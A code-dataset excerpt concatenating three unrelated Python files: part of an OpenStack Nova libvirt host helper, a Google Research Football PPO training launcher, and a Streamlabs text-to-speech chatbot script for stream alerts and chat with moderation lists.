elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
else:
msg = _("Invalid usage_type: %s")
raise exception.NovaException(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s' % xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error defining a secret with XML: %s'), xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
def _get_hardware_info(self):
"""Returns hardware information about the Node.
Note that the memory size is reported in MiB instead of KiB.
"""
return self.get_connection().getInfo()
def get_cpu_count(self):
"""Returns the total numbers of cpu in the host."""
return self._get_hardware_info()[2]
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
return self._get_hardware_info()[1]
def get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
if CONF.libvirt.virt_type == 'xen':
used = 0
for guest in self.list_guests(only_guests=False):
try:
# TODO(sahid): Use get_info...
dom_mem = int(guest._get_domain_info(self)[2])
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s"),
{"uuid": guest.uuid, "ex": e})
continue
# skip dom0
if guest.id != 0:
used += dom_mem
else:
# the mem reported by dom0 is be greater of what
# it is being used
used += (dom_mem -
(int(m[idx1 + 1]) +
int(m[idx2 + 1]) +
int(m[idx3 + 1])))
# Convert it to MB
return used // units.Ki
else:
avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
# Convert it to MB
return self.get_memory_mb_total() - avail // units.Ki
def get_cpu_stats(self):
"""Returns the current CPU state of the host with frequency."""
stats = self.get_connection().getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# No. 3 is the expected CPU frequency.
stats["frequency"] = self._get_hardware_info()[3]
return stats
def write_instance_config(self, xml):
"""Defines a domain, but does not start it.
:param xml: XML domain definition of the guest.
:returns: a virDomain instance
"""
return self.get_connection().defineXML(xml)
def device_lookup_by_name(self, name):
"""Lookup a node device by its name.
:returns: a virNodeDevice instance
"""
return self.get_connection().nodeDeviceLookupByName(name)
def list_pci_devices(self, flags=0):
"""Lookup pci devices.
:returns: a list of virNodeDevice instance
"""
return self.get_connection().listDevices("pci", flags)
def compare_cpu(self, xmlDesc, flags=0):
"""Compares the given CPU description with the host CPU."""
return self.get_connection().compareCPU(xmlDesc, flags)
def is_cpu_control_policy_capable(self):
"""Returns whether kernel configuration CGROUP_SCHED is enabled
CONFIG_CGROUP_SCHED may be disabled in some kernel configs to
improve scheduler latency.
"""
try:
with open("/proc/self/mounts", "r") as fd:
for line in fd.readlines():
# mount options and split options
bits = line.split()[3].split(",")
if "cpu" in bits:
return True
return False
except IOError:
return False
|
kw_train.py
|
import gfootball.env as football_env
import time, os
import numpy as np
import torch
import torch.multiprocessing as mp
#
from actor import *
from learner import *
from evaluator import evaluator
################################################################################
def save_args(arg_dict):
os.makedirs(arg_dict['log_dir'])
with open(arg_dict['log_dir'] + '/args.json', 'w') as out:
json.dump(arg_dict, indent = 4, out)
################################################################################
def main(arg_dict):
os.environ['OPENBLAS_NUM_THREADS'] = '1' #???
cur_time = datetime.now()
arg_dict['log_dir'] = 'logs/' + cur_time.strftime('[%m-%d]%H.%M.%S')
save_args(arg_dict)
#
np.set_printoptions(precision = 3)
np.set_printoptions(suppress = True)
pp = pprint.PrettyPrinter(indent = 4)
torch.set_num_threads(1) #???
#
fe = importlib.import_module('encoders.' + arg_dict['encoder'])
fe = fe.FeatureEncoder()
arg_dict['feature_dims'] = fe.get_feature_dims()
#
model = importlib.import_module('models.' + arg_dict['model'])
cpu_device = torch.device('cpu') # gpu
center_model = model.Model(arg_dict)
#
if arg_dict['trained_model_path']:
checkpoint = torch.load(arg_dict['trained_model_path'], map_location = cpu_device)
optimization_step = checkpoint['optimization_step']
center_model.load_state_dict(checkpoint['model_state_dict'])
center_model.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
arg_dict['optimization_step'] = optimization_step
print('Trained model', arg_dict['trained_model_path'], 'suffessfully loaded')
else:
optimization_step = 0
model_dict = {
'optimization_step': optimization_step,
'model_state_dict': center_model.state_dict(),
'optimizer_state_dict': center_model.optimizer.state_dict(),
}
path = arg_dict['log_dir'] + f'/model_{optimization_step}.tar'
torch.save(model_dict, path)
center_model.share_memory()
data_queue = mp.Queue()
signal_queue = mp.Queue()
summary_queue = mp.Queue()
processes = []
p = mp.Process(target = learner, args = (center_model, data_queue, signal_queue, summary_queue, arg_dict))
p.start()
processes.append(p)
for rank in range(arg_dict['num_processes']):
if arg_dict['env'] == '11_vs_11_kaggle':
p = mp.Process(target = actor_self, args = (rank, center_model, data_queue, signal_queue, summary_queue, arg_dict))
else:
p = mp.Process(target = actor, args = (rank, center_model, data_queue, signal_queue, summary_queue, arg_dict))
p.start()
processes.append(p)
#
if 'env_evaluation' in arg_dict:
p = mp.Process(target = evaluator, args = (center_model, signal_queue, summary_queue, arg_dict))
p.start()
processes.append(p)
#
for p in processes:
p.join()
################################################################################
if __name__ == '__main__':
arg_dict = {
'env': '11_vs_11_kaggle',
# '11_vs_11_kaggle' : environment used for self-play training
# '11_vs_11_stochastic' : environment used for training against fixed opponent(rule-based AI)
'env_evaluation': '11_vs_11_hard_stochastic', # for evaluation of self-play trained agent (like validation set in Supervised Learning)
'trained_model_path': None,
#
'summary_game_window': 10,
'model_save_interval': 300000,
'batch_size': 32,
'buffer_size': 6,
'rollout_len': 30,
'lstm_size': 256,
#algo
'gamma': 0.993,
'lmbda': 0.96,
'k_epoch': 3,
'entropy_coef': 0.0001,
'grad_clip': 3.0,
'eps_clip': 0.1,
#
'encoder': 'encoder_basic',
'rewarder': 'rewarder_basic',
'model': 'conv1d',
'algorithm': 'ppo'
}
main(arg_dict)
|
TTSAlertsAndChat_StreamlabsSystem.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
""" Text-To-Speech for Alerts and Chat Messages
1.1.4
Fixed bug adding unicode characters to banned words list
Added setting for ban messages
Added ability to ban users for a time
1.1.3
Fixed bug where banned words showed on overlay
1.1.2
Support ascii characters in overlay
1.1.1
Control overlay position/message, ban users, and set a character limit
1.1.0
Added $tts parameter, text-to-speech overlay, fixed twitch sub
1.0.0
Initial public release
"""
#---------------------------------------
# Script Import Libraries
#---------------------------------------
import os
import codecs
import json
from collections import OrderedDict
import time
import re
import threading
import clr
clr.AddReference("IronPython.Modules.dll")
clr.AddReference('System.Speech')
clr.AddReferenceToFileAndPath(os.path.join(os.path.dirname(os.path.realpath(__file__)), "StreamlabsEventReceiver.dll"))
from System.Speech.Synthesis import SpeechSynthesizer
from StreamlabsEventReceiver import StreamlabsEventClient
#---------------------------------------
# Script Information
#---------------------------------------
ScriptName = "TTS Alerts and Chat"
Website = "https://www.twitch.tv/kruiser8"
Description = "Text-to-speech for streamlabs alerts and chat messages."
Creator = "Kruiser8"
Version = "1.1.4"
#---------------------------------------
# Script Variables
#---------------------------------------
# Socket Receiver
EventReceiver = None
# Settings file location
SettingsFile = os.path.join(os.path.dirname(__file__), "settings.json")
# UI Config file location
UIConfigFile = os.path.join(os.path.dirname(__file__), "UI_Config.json")
# Banned user file
BannedUserFile = os.path.join(os.path.dirname(__file__), "users.txt")
# Banned word file
BannedWordFile = os.path.join(os.path.dirname(__file__), "banned.txt")
# TTS Parser
RegTTS = re.compile(r"\$tts\((?P<message>.*?)\)")
SubPlanMap = {
"Prime": "Prime",
"1000": "Tier 1",
"2000": "Tier 2",
"3000": "Tier 3"
}
#---------------------------------------
# Script Classes
#---------------------------------------
class Settings(object):
""" Load in saved settings file if available else set default values. """
def __init__(self, settingsfile=None):
try:
with codecs.open(settingsfile, encoding="utf-8-sig", mode="r") as f:
self.__dict__ = json.load(f, encoding="utf-8")
except:
self.VoiceName = ""
self.Volume = 80
self.Rate = 0
self.MaxCharacters = 0
self.MaxCharacterMessage = "{user}, your message was too long for text-to-speech."
self.TTSCommand = "!tts"
self.TTSCommandPermission = "Caster"
self.TTSCommandPermissionInfo = ""
self.TTSCommandCost = 500
self.TTSCommandMessage = "{user} says, {message}"
self.TTSCommandUsage = "Stream Chat"
self.TTSCommandUsageReply = False
self.TTSCommandUsageReplyMessage = "{user} you can only use this command from {usage}!"
self.TTSUseCD = False
self.TTSCasterCD = True
self.TTSCooldown = 0
self.TTSOnCooldown = "{user} the command is still on cooldown for {cooldown} seconds!"
self.TTSUserCooldown = 10
self.TTSOnUserCooldown = "{user} the command is still on user cooldown for {cooldown} seconds!"
self.TTSAllChat = False
self.TTSAllChatExcludeCommands = True
self.TTSAllChatMessage = "{user} says, {message}"
self.TTSAllChatUsage = "Stream Chat"
self.TTSAllChatUsageReply = False
self.TTSAllChatUsageReplyMessage = "{user} you can only use this command from {usage}!"
self.TTSOverlayExcludeAlerts = True
self.TTSOverlayMessage = "{user} says, {message}"
self.TTSOverlayTime = 8
self.TTSOverlayFontColor = "rgba(255,255,255,1.0)"
self.TTSOverlayUseFontOutline = False
self.TTSOverlayFontOutline = "rgba(0,0,0,0)"
self.TTSOverlayUseFontShadow = True
self.TTSOverlayFontShadow = "rgba(0,0,0,1.0)"
self.TTSOverlayFontSize = 32
self.TTSOverlayFont = ""
self.TTSOverlayUseBackground = True
self.TTSOverlayBackgroundColor = "rgba(0,0,0,1.0)"
self.TTSOverlayUseBorder = True
self.TTSOverlayBorderColor = "rgba(255,255,255,1.0)"
self.TTSOverlayHorizontalAlign = "center"
self.TTSOverlayVerticalAlign = "center"
self.TTSOverlayAnimateIn = 'fadeIn'
self.TTSOverlayAnimateOut = 'fadeOut'
self.MixerOnFollow = False
self.MixerFollowDelay = 0
self.MixerFollowMessage = "{name} has followed."
self.MixerOnHost = False
self.MixerHostMinimum = 0
self.MixerHostDelay = 0
self.MixerHostMessage = "{name} has hosted you with {amount} viewer{isPlural}."
self.MixerOnSub = False
self.MixerIncludeSubMessage = True
self.MixerSubDelay = 0
self.MixerSubMessage = "{name} has subscribed ({tier})."
self.MixerResubMessage = "{name} has resubscribed ({tier}) for {months} months."
self.StreamlabsOnDonation = False
self.StreamlabsIncludeDonationMessage = True
self.StreamlabsDonationMinimum = 1
self.StreamlabsDonationDelay = 0
self.StreamlabsDonationMessage = "{name} donated {amount}."
self.TwitchOnCheer = False
self.TwitchIncludeCheerMessage = True
self.TwitchCheerMinimum = 100
self.TwitchCheerDelay = 0
self.TwitchCheerMessage = "{name} has used {amount} bit{isPlural}."
self.TwitchOnFollow = False
self.TwitchFollowDelay = 0
self.TwitchFollowMessage = "{name} has followed."
self.TwitchOnHost = False
self.TwitchHostMinimum = 0
self.TwitchHostDelay = 0
self.TwitchHostMessage = "{name} has hosted you with {amount} viewer{isPlural}."
self.TwitchOnRaid = False
self.TwitchRaidMinimum = 0
self.TwitchRaidDelay = 0
self.TwitchRaidMessage = "{name} has raided you with a party of {amount}."
self.TwitchOnSub = False
self.TwitchIncludeSubMessage = True
self.TwitchSubDelay = 0
self.TwitchSubMessage = "{name} has subscribed ({tier})."
self.TwitchResubMessage = "{name} has resubscribed ({tier}) for {months} months."
self.TwitchGiftMessage = "{gifter} has gifted a sub ({tier}) to {name} ({months} month{isPlural})."
self.TwitchGiftMassMessage = "{gifter} has gifted {amount} subs to the channel: {recipients}."
self.YoutubeOnFollow = False
self.YoutubeFollowDelay = 0
self.YoutubeFollowMessage = "{name} has followed."
self.YoutubeOnSub = False
self.YoutubeIncludeSubMessage = True
self.YoutubeSubDelay = 0
self.YoutubeSubMessage = "{name} has subscribed ({tier})."
self.YoutubeResubMessage = "{name} has resubscribed ({tier}) for {months} months."
self.YoutubeOnSuperchat = False
self.YoutubeIncludeSuperchatMessage = True
self.YoutubeSuperchatMinimum = 5
self.YoutubeSuperchatDelay = 0
self.YoutubeSuperchatMessage = "{name} donated {amount}."
self.BanUserCommand = "!banuser"
self.BanUserCommandPermission = "Caster"
self.BanUserCommandPermissionInfo = ""
self.BanUserAddResponse = "The user was banned from using TTS."
self.BanUserResponseResponse = "The user is now able to use TTS."
self.BanWordCommand = "!banword"
self.BanWordCommandPermission = "Caster"
self.BanWordCommandPermissionInfo = ""
self.BanWordAddResponse = "The word was added to the banned words list."
self.BanWordRemoveResponse = "The word was removed from the banned words list."
self.BannedAction = "Skip Messages with Banned Words"
self.BannedActionBoolean = True
self.BannedMatchWholeWord = True
self.BannedReplacement = ""
self.SocketToken = None
def Reload(self, jsondata):
""" Reload settings from Streamlabs user interface by given json data. """
self.__dict__ = json.loads(jsondata, encoding="utf-8")
def Save(self, settingsfile):
""" Save settings contained within to .json and .js settings files. """
try:
with codecs.open(settingsfile, encoding="utf-8-sig", mode="w+") as f:
json.dump(self.__dict__, f, encoding="utf-8", ensure_ascii=False)
with codecs.open(settingsfile.replace("json", "js"), encoding="utf-8-sig", mode="w+") as f:
f.write("var settings = {0};".format(json.dumps(self.__dict__, encoding='utf-8', ensure_ascii=False)))
except:
Parent.Log(ScriptName, "Failed to save settings to file.")
class UIConfig(object):
""" Load in saved settings file if available else set default values. """
def __init__(self, uiconfigfile=None):
try:
with codecs.open(uiconfigfile, encoding="utf-8-sig", mode="r") as f:
self.__dict__ = json.load(f, encoding="utf-8", object_pairs_hook=OrderedDict)
except:
Parent.SendStreamWhisper(Parent.GetChannelName(), "Failed to read UIConfig file: " + str(sys.exc_info()[1]))
def Save(self, uiconfigfile):
""" Save UI Config contained within to .json file. """
if len(self.__dict__) > 0:
try:
with codecs.open(uiconfigfile, encoding="utf-8-sig", mode="w+") as f:
json.dump(self.__dict__, f, encoding="utf-8", ensure_ascii=False)
except:
Parent.SendStreamWhisper(Parent.GetChannelName(), "Failed to save ui config to file.")
#---------------------------------------
# Event Receiver Functions
#---------------------------------------
def EventReceiverConnected(sender, args):
Parent.Log(ScriptName, "Connected")
return
def EventReceiverDisconnected(sender, args):
Parent.Log(ScriptName, "Disconnected")
def EventReceiverEvent(sender, args):
handleEvent(sender,args)
def handleEvent(sender, args):
# Just grab the all data in from the event
evntdata = args.Data
# Check if it contains data and for what streaming service it is
if evntdata and evntdata.For == "twitch_account":
if evntdata.Type == "follow" and ScriptSettings.TwitchOnFollow:
for message in evntdata.Message:
ttsMessage = ScriptSettings.TwitchFollowMessage.format(name=message.Name)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchFollowDelay)
elif evntdata.Type == "bits" and ScriptSettings.TwitchOnCheer:
s = ''
for message in evntdata.Message:
if message.Amount >= ScriptSettings.TwitchCheerMinimum:
if message.Amount > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.TwitchCheerMessage.format(name=message.Name, amount=message.Amount, isPlural=s)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchCheerDelay, ScriptSettings.TwitchIncludeCheerMessage, message.Message, message.Name)
elif evntdata.Type == "host" and ScriptSettings.TwitchOnHost:
s = ''
for message in evntdata.Message:
if int(message.Viewers) >= ScriptSettings.TwitchHostMinimum:
if message.Viewers > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.TwitchHostMessage.format(name=message.Name, amount=str(message.Viewers), isPlural=s)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchHostDelay)
elif evntdata.Type == "raid" and ScriptSettings.TwitchOnRaid:
for message in evntdata.Message:
if int(message.Raiders) >= ScriptSettings.TwitchRaidMinimum:
ttsMessage = ScriptSettings.TwitchRaidMessage.format(name=message.Name, amount=str(message.Raiders))
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchRaidDelay)
elif evntdata.Type == "subscription" and ScriptSettings.TwitchOnSub:
try:
s = ''
if len(evntdata.Message) > 1 and evntdata.Message[0].Gifter:
names = []
for message in evntdata.Message:
names.append(message.Name)
giftees = ', '.join(names)
ttsMessage = ScriptSettings.TwitchGiftMassMessage.format(recipients=giftees, gifter=message.Gifter, amount=len(names))
else:
for message in evntdata.Message:
tier = SubPlanMap[str(message.SubPlan)]
ttsMessage = ''
if message.Gifter:
if message.Months > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.TwitchGiftMessage.format(name=message.Name, gifter=message.Gifter, tier=tier, months=message.Months, isPlural=s)
else:
if message.Months == 1:
ttsMessage = ScriptSettings.TwitchSubMessage.format(name=message.Name, tier=tier, months=message.Months)
else:
ttsMessage = ScriptSettings.TwitchResubMessage.format(name=message.Name, tier=tier, months=message.Months)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchSubDelay, ScriptSettings.TwitchIncludeSubMessage, message.Message, message.Name)
except Exception as e:
Parent.SendStreamWhisper(Parent.GetChannelName(), 'Failed to process subscription. Please see logs (i).')
Parent.Log(ScriptName, str(e.args))
elif evntdata and evntdata.For == "mixer_account":
if evntdata.Type == "follow" and ScriptSettings.MixerOnFollow:
for message in evntdata.Message:
ttsMessage = ScriptSettings.MixerFollowMessage.format(name=message.Name)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.MixerFollowDelay)
elif evntdata.Type == "subscription" and ScriptSettings.MixerOnSub:
for message in evntdata.Message:
ttsMessage = ''
if message.Months == 1:
ttsMessage = ScriptSettings.MixerSubMessage.format(name=message.Name, tier=tier, months=message.Months)
else:
ttsMessage = ScriptSettings.MixerResubMessage.format(name=message.Name, tier=tier, months=message.Months)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.MixerSubDelay, ScriptSettings.MixerIncludeSubMessage, message.Message, message.Name)
elif evntdata.Type == "host" and ScriptSettings.MixerOnHost:
s = ''
for message in evntdata.Message:
if int(message.Viewers) >= ScriptSettings.MixerHostMinimum:
if message.Viewers > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.MixerHostMessage.format(name=message.Name, amount=str(message.Viewers), isPlural=s)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.MixerHostDelay)
elif evntdata and evntdata.For == "streamlabs":
if evntdata.Type == "donation" and ScriptSettings.StreamlabsOnDonation:
for message in evntdata.Message:
if float(message.Amount) >= ScriptSettings.StreamlabsDonationMinimum:
ttsMessage = ScriptSettings.StreamlabsDonationMessage.format(name=message.Name, amount=str(message.FormattedAmount))
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.StreamlabsDonationDelay, ScriptSettings.StreamlabsIncludeDonationMessage, message.Message, message.Name)
elif evntdata and evntdata.For == "youtube_account":
if evntdata.Type == "follow" and ScriptSettings.YoutubeOnFollow:
for message in evntdata.Message:
ttsMessage = ScriptSettings.YoutubeFollowMessage.format(name=message.Name)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.YoutubeFollowDelay)
elif evntdata.Type == "subscription" and ScriptSettings.YoutubeOnSub:
for message in evntdata.Message:
ttsMessage = ''
if message.Months == 1:
ttsMessage = ScriptSettings.YoutubeSubMessage.format(name=message.Name, tier=tier, months=message.Months)
else:
ttsMessage = ScriptSettings.YoutubeResubMessage.format(name=message.Name, tier=tier, months=message.Months)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.YoutubeSubDelay)
elif evntdata.Type == "superchat" and ScriptSettings.YoutubeOnSuperchat:
for message in evntdata.Message:
if float(message.Amount) >= ScriptSettings.YoutubeSuperchatMinimum:
ttsMessage = ScriptSettings.YoutubeSuperchatMessage.format(name=message.Name, amount=str(message.FormattedAmount))
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.YoutubeSuperchatDelay, ScriptSettings.YoutubeIncludeSuperchatMessage, message.Message, message.Name)
#---------------------------------------
# Script Functions
#---------------------------------------
def updateUIConfig():
voices = []
for voice in spk.GetInstalledVoices():
info = voice.VoiceInfo
voices.append(info.Name)
UIConfigs = UIConfig(UIConfigFile)
UIConfigs.VoiceName['items'] = voices
if ScriptSettings.VoiceName not in voices:
ScriptSettings.VoiceName = ''
ScriptSettings.Save(SettingsFile)
UIConfigs.Save(UIConfigFile)
def updateBannedSettings():
global ScriptSettings, reBanned, bannedWords, bannedUsers
ScriptSettings.BannedActionBoolean = bool(ScriptSettings.BannedAction == 'Skip Messages with Banned Words')
if ScriptSettings.BannedMatchWholeWord:
reBanned = re.compile(r"\b({0})\b".format('|'.join(bannedWords)), re.IGNORECASE)
else:
reBanned = re.compile(r"({0})".format('|'.join(bannedWords)), re.IGNORECASE)
def SendOverlayUpdate(message):
""" Send updated information to the overlay. """
message = message.encode('utf8', 'replace')
payload = {
'message': message,
'time': ScriptSettings.TTSOverlayTime,
'fontColor': ScriptSettings.TTSOverlayFontColor,
'useOutline': ScriptSettings.TTSOverlayUseFontOutline,
'fontOutline': ScriptSettings.TTSOverlayFontOutline,
'useShadow': ScriptSettings.TTSOverlayUseFontShadow,
'fontShadow': ScriptSettings.TTSOverlayFontShadow,
'fontSize': ScriptSettings.TTSOverlayFontSize,
'font': ScriptSettings.TTSOverlayFont,
'useBackground': ScriptSettings.TTSOverlayUseBackground,
'background': ScriptSettings.TTSOverlayBackgroundColor,
'useBorder': ScriptSettings.TTSOverlayUseBorder,
'border': ScriptSettings.TTSOverlayBorderColor,
'horizontalAlign': ScriptSettings.TTSOverlayHorizontalAlign,
'verticalAlign': ScriptSettings.TTSOverlayVerticalAlign,
'animateIn': ScriptSettings.TTSOverlayAnimateIn,
'animateOut': ScriptSettings.TTSOverlayAnimateOut,
}
Parent.BroadcastWsEvent("EVENT_TTS_AC_OVERLAY", json.dumps(payload))
def SendTTSMessage(voice, message, isAlert, user = '', text = '', displayName = ''):
if user and user in bannedUsers:
return
if user and not text:
text = message
if not isAlert and user and ScriptSettings.MaxCharacters != 0 and len(message) > ScriptSettings.MaxCharacters:
Parent.SendStreamMessage(ScriptSettings.MaxCharacterMessage.format(user=displayName))
return
if ScriptSettings.BannedActionBoolean:
if bool(reBanned.search(message)):
return
else:
message = reBanned.sub(ScriptSettings.BannedReplacement, message)
text = reBanned.sub(ScriptSettings.BannedReplacement, text)
displayName = reBanned.sub(ScriptSettings.BannedReplacement, displayName)
try:
if (isAlert and not ScriptSettings.TTSOverlayExcludeAlerts) or (not isAlert and not user):
SendOverlayUpdate(message)
elif not isAlert:
SendOverlayUpdate(ScriptSettings.TTSOverlayMessage.format(user=displayName, message=text))
voice.Speak(message)
except Exception as e:
Parent.SendStreamWhisper(Parent.GetChannelName(), 'TTS Failed, please see the script logs (i).')
Parent.Log(ScriptName, str(e.args))
def SendTTSMessagesWithDelay(message, delay, includeExtra = False, extraMessage = '', user = ''):
if delay > 0:
time.sleep(delay)
global spk
SendTTSMessage(spk, message, True)
if includeExtra:
SendTTSMessage(spk, extraMessage, False, user)
def readFileArray(fileToRead):
lines = []
with open(fileToRead) as f:
lines = f.readlines()
lines = [x.strip().decode("utf-8", "replace") for x in lines]
return lines
def writeArrayToFile(arrayToWrite, fileToWrite):
with open(fileToWrite, 'w') as f:
f.write('\n'.join(arrayToWrite).encode('utf8', 'replace'))
def handleBanUser(data, user):
global bannedUsers
if user in bannedUsers:
bannedUsers.remove(user)
Parent.SendStreamMessage(ScriptSettings.BanUserRemoveResponse.format(user=data.UserName, banned=user))
else:
bannedUsers.append(user)
Parent.SendStreamMessage(ScriptSettings.BanUserAddResponse.format(user=data.UserName, banned=user))
writeArrayToFile(bannedUsers, BannedUserFile)
#---------------------------------------
# Chatbot Initialize Function
#---------------------------------------
def Init():
# Load settings from file and verify
global ScriptSettings
ScriptSettings = Settings(SettingsFile)
global spk
spk = SpeechSynthesizer()
spk.Rate = ScriptSettings.Rate
spk.Volume = ScriptSettings.Volume
updateUIConfig()
global bannedWords, bannedUsers
bannedUsers = readFileArray(BannedUserFile)
bannedWords = readFileArray(BannedWordFile)
updateBannedSettings()
if ScriptSettings.VoiceName != '':
spk.SelectVoice(ScriptSettings.VoiceName)
# Init the Streamlabs Event Receiver
global EventReceiver
EventReceiver = StreamlabsEventClient()
EventReceiver.StreamlabsSocketConnected += EventReceiverConnected
EventReceiver.StreamlabsSocketDisconnected += EventReceiverDisconnected
EventReceiver.StreamlabsSocketEvent += EventReceiverEvent
# Auto Connect if key is given in settings
if ScriptSettings.SocketToken:
EventReceiver.Connect(ScriptSettings.SocketToken)
# End of Init
return
#---------------------------------------
# Chatbot Save Settings Function
#---------------------------------------
def ReloadSettings(jsondata):
# Reload newly saved settings and verify
ScriptSettings.Reload(jsondata)
updateBannedSettings()
if ScriptSettings.VoiceName != '':
global spk
spk.SelectVoice(ScriptSettings.VoiceName)
spk.Rate = ScriptSettings.Rate
spk.Volume = ScriptSettings.Volume
global EventReceiver
if not EventReceiver.IsConnected and ScriptSettings.SocketToken:
EventReceiver.Connect(ScriptSettings.SocketToken)
elif EventReceiver.IsConnected and not ScriptSettings.SocketToken:
EventReceiver.Disconnect()
# End of ReloadSettings
return
#---------------------------------------
# Chatbot Script Unload Function
#---------------------------------------
def Unload():
global EventReceiver
if EventReceiver.IsConnected:
EventReceiver.Disconnect()
EventReceiver = None
#---------------------------
# [Optional] ScriptToggled (Notifies you when a user disables your script or enables it)
#---------------------------
def ScriptToggled(state):
global EventReceiver
if not state and EventReceiver.IsConnected:
EventReceiver.Disconnect()
elif state and not EventReceiver.IsConnected and ScriptSettings.SocketToken:
EventReceiver.Connect(ScriptSettings.SocketToken)
return
#---------------------------------------
# Chatbot Execute Function
#---------------------------------------
def Execute(data):
if data.IsChatMessage():
command = data.GetParam(0)
if command == ScriptSettings.TTSCommand and IsFromValidSource(data, ScriptSettings.TTSCommandUsage, ScriptSettings.TTSCommandUsageReply, ScriptSettings.TTSCommandUsageReplyMessage):
if HasPermission(data, ScriptSettings.TTSCommandPermission, ScriptSettings.TTSCommandPermissionInfo):
if not IsOnCooldown(data, ScriptSettings.TTSCommand, ScriptSettings.TTSCasterCD, ScriptSettings.TTSUseCD, ScriptSettings.TTSOnCooldown, ScriptSettings.TTSOnUserCooldown):
if HasCurrency(data, ScriptSettings.TTSCommandCost):
commandOffset = len(ScriptSettings.TTSCommand) + 1
text = data.Message[commandOffset:]
message = ScriptSettings.TTSCommandMessage.format(user=data.UserName, message=text)
messageThread = threading.Thread(target=SendTTSMessage, args=(spk, message, False, data.UserName.lower(), text, data.UserName))
messageThread.daemon = True
messageThread.start()
Parent.AddUserCooldown(ScriptName, ScriptSettings.TTSCommand, data.User, ScriptSettings.TTSUserCooldown)
Parent.AddCooldown(ScriptName, ScriptSettings.TTSCommand, ScriptSettings.TTSCooldown)
elif command == ScriptSettings.BanWordCommand and HasPermission(data, ScriptSettings.BanWordCommandPermission, ScriptSettings.BanWordCommandPermissionInfo) and data.GetParamCount() > 1:
message = data.GetParam(1)
i = 2
while i < data.GetParamCount():
message = message + ' ' + data.GetParam(i)
i = i + 1
if message:
global bannedWords
isPhrase = (' ' in message)
if message in bannedWords:
bannedWords.remove(message)
if isPhrase:
Parent.SendStreamMessage(ScriptSettings.BanWordRemoveResponse.format(user=data.UserName, word=message))
else:
Parent.SendStreamMessage(ScriptSettings.BanWordRemoveResponse.format(user=data.UserName, word=message))
else:
bannedWords.append(message)
if isPhrase:
Parent.SendStreamMessage(ScriptSettings.BanWordAddResponse.format(user=data.UserName, word=message))
else:
Parent.SendStreamMessage(ScriptSettings.BanWordAddResponse.format(user=data.UserName, word=message))
writeArrayToFile(bannedWords, BannedWordFile)
updateBannedSettings()
elif command == ScriptSettings.BanUserCommand and HasPermission(data, ScriptSettings.BanUserCommandPermission, ScriptSettings.BanUserCommandPermissionInfo) and data.GetParamCount() > 1:
user = data.GetParam(1).lower()
if user:
handleBanUser(data, user)
if data.GetParamCount() > 2:
time = data.GetParam(2)
if time.isdigit():
banThread = threading.Timer(int(time), handleBanUser, args=(data, user))
banThread.daemon = True
banThread.start()
if ScriptSettings.TTSAllChat and IsFromValidSource(data, ScriptSettings.TTSAllChatUsage, ScriptSettings.TTSAllChatUsageReply, ScriptSettings.TTSAllChatUsageReplyMessage):
if not ScriptSettings.TTSAllChatExcludeCommands or command[0] != '!':
message = ScriptSettings.TTSAllChatMessage.format(user=data.UserName, message=data.Message)
messageThread = threading.Thread(target=SendTTSMessage, args=(spk, message, False, data.UserName.lower(), data.Message, data.UserName))
messageThread.daemon = True
messageThread.start()
# End of execute
return
#---------------------------------------
# Chatbot Execute Helper Functions
#---------------------------------------
def SendResp(data, Message):
"""Sends message to Stream or discord chat depending on settings"""
if not data.IsFromDiscord() and not data.IsWhisper():
Parent.SendStreamMessage(Message)
if not data.IsFromDiscord() and data.IsWhisper():
Parent.SendStreamWhisper(data.User, Message)
if data.IsFromDiscord() and not data.IsWhisper():
Parent.SendDiscordMessage(Message)
if data.IsFromDiscord() and data.IsWhisper():
Parent.SendDiscordDM(data.User, Message)
def IsFromValidSource(data, Usage, SendResponse, UsageResponse):
"""Return true or false depending on the message is sent from
a source that's in the usage setting or not"""
usedDiscord = data.IsFromDiscord()
usedWhisper = data.IsWhisper()
if not usedDiscord:
l = ["Stream Chat", "Chat Both", "All", "Stream Both"]
if not usedWhisper and (Usage in l):
return True
l = ["Stream Whisper", "Whisper Both", "All", "Stream Both"]
if usedWhisper and (Usage in l):
return True
if usedDiscord:
l = ["Discord Chat", "Chat Both", "All", "Discord Both"]
if not usedWhisper and (Usage in l):
return True
